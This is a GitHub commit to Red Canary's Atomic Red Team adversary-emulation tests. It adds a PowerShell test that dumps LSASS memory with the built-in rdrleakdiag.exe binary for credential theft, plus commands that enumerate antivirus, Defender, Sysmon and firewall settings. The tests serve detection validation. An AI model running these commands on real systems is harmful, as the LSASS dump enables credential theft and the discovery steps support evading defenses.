Added few new tests for T1518.001 and also rdrleakdiag.exe test acces…

…sing lsass (#2550) * Added lolbin rdrleakdiag support for lsass dumping and some Security Software Discovery tests * Changes done as suggested --------- Co-authored-by: Hare Sudhan <[email protected]> Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Oct 3, 2023 · 9026f98 · 9026f98
1 parent a007c27
commit 9026f98
Show file tree

Hide file tree

Showing 2 changed files with 78 additions and 1 deletion.
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
@@ -352,3 +352,30 @@ atomic_tests:
       Remove-Item #{output_file} -ErrorAction Ignore
     name: powershell
     elevation_required: true
+- name: Dump LSASS.exe using lolbin rdrleakdiag.exe
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. 
+    This can be achieved with lolbin rdrleakdiag.exe. 
+
+    Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and  $env:TEMP\results_<PID>.hlk.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
+            $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
+        } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
+            $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
+        } else {
+            $binary_path = "File not found"
+            exit 1
+        }
+      $lsass_pid = get-process lsass |select -expand id
+      if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
+      write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
+      & $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
+      Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
+    cleanup_command: |
+      Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
diff --git a/atomics/T1518.001/T1518.001.yaml b/atomics/T1518.001/T1518.001.yaml
@@ -12,7 +12,16 @@ atomic_tests:
   - windows
   executor:
     command: |
-      netsh.exe advfirewall  show allprofiles
+      netsh.exe advfirewall  show allprofiles 
+      netsh.exe advfirewall firewall dump
+      netsh.exe advfirewall show currentprofile
+      netsh.exe advfirewall firewall show rule name=all
+      netsh.exe firewall show state
+      netsh.exe firewall show config
+      sc query windefend
+      powershell.exe /c "Get-Process | Where-Object { $_.ProcessName -eq 'Sysmon' }"
+      powershell.exe /c "Get-Service | where-object {$_.DisplayName -like '*sysm*'}"
+      powershell.exe /c "Get-CimInstance Win32_Service -Filter 'Description = ''System Monitor service'''"
       tasklist.exe
       tasklist.exe | findstr /i virus
       tasklist.exe | findstr /i cb
@@ -40,6 +49,7 @@ atomic_tests:
       get-process | ?{$_.Description -like "*cylance*"}
       get-process | ?{$_.Description -like "*mc*"}
       get-process | ?{$_.ProcessName -like "*mc*"}
+      get-process | Where-Object { $_.ProcessName -eq "Sysmon" }
     name: powershell
 - name: Security Software Discovery - ps (macOS)
   auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840
@@ -88,3 +98,43 @@ atomic_tests:
     command: wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
     name: command_prompt
     elevation_required: true
+- name: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets
+  description: |
+    Discovery of installed antivirus products via Get-CimInstance and Get-WmiObject cmdlets of powershell.
+
+    when sucessfully executed, information about installed AV software is displayed..
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      powershell Get-CimInstance -Namespace root/securityCenter2 -classname antivirusproduct
+      powershell Get-WmiObject -Namespace root\securitycenter2 -Class antivirusproduct
+    name: command_prompt 
+    elevation_required: true
+- name: Security Software Discovery - Windows Defender Enumeration
+  description: |
+    Windows Defender Enumeration via different built-in windows native tools.
+    when sucessfully executed, information about windows defender is displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-Service WinDefend #check the service state of Windows Defender
+      Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
+      Get-MpThreat #threats details that have been detected using MS Defender
+    name: powershell 
+    elevation_required: true
+- name: Security Software Discovery - Windows Firewall Enumeration
+  description: |
+    Enumerates windows firewall to retrieves firewall rules from the target computer.
+
+    when sucessfully executed, details of windows firewall is displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Get-NetFirewallProfile | Format-Table Name, Enabled
+      Get-NetFirewallSetting
+      Get-NetFirewallRule | select DisplayName, Enabled, Description
+    name: powershell 
+    elevation_required: true